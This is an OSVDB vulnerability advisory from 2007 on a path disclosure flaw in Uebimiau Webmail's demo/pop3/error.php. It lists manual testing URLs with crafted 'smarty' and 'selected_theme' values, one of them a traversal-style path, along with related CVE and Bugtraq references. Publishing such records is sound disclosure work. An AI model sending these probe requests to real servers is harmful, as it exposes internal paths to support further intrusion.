Uebimiau Webmail demo/pop3/error.php Multiple Variable Path Disclosure

2007-05-28T00:00:00
ID OSVDB:38337
Type osvdb
Reporter OSVDB
Modified 2007-05-28T00:00:00

Description

Manual Testing Notes

http://[target]/demo/pop3/error.php?smarty=test http://[target]/demo/pop3/error.php?selected_theme=test http://[target]/demo/pop3/error.php?selected_theme=: http://[target]/demo/pop3/error.php?selected_theme=/etc/apache2/../../var/www/web6/web/demo/pop3/themes/uebimiau/

References:

Related OSVDB ID: 37464 Related OSVDB ID: 37463 Mail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2007-05/0511.html ISS X-Force ID: 34555 CVE-2007-3172 CVE-2007-3171 Bugtraq ID: 24210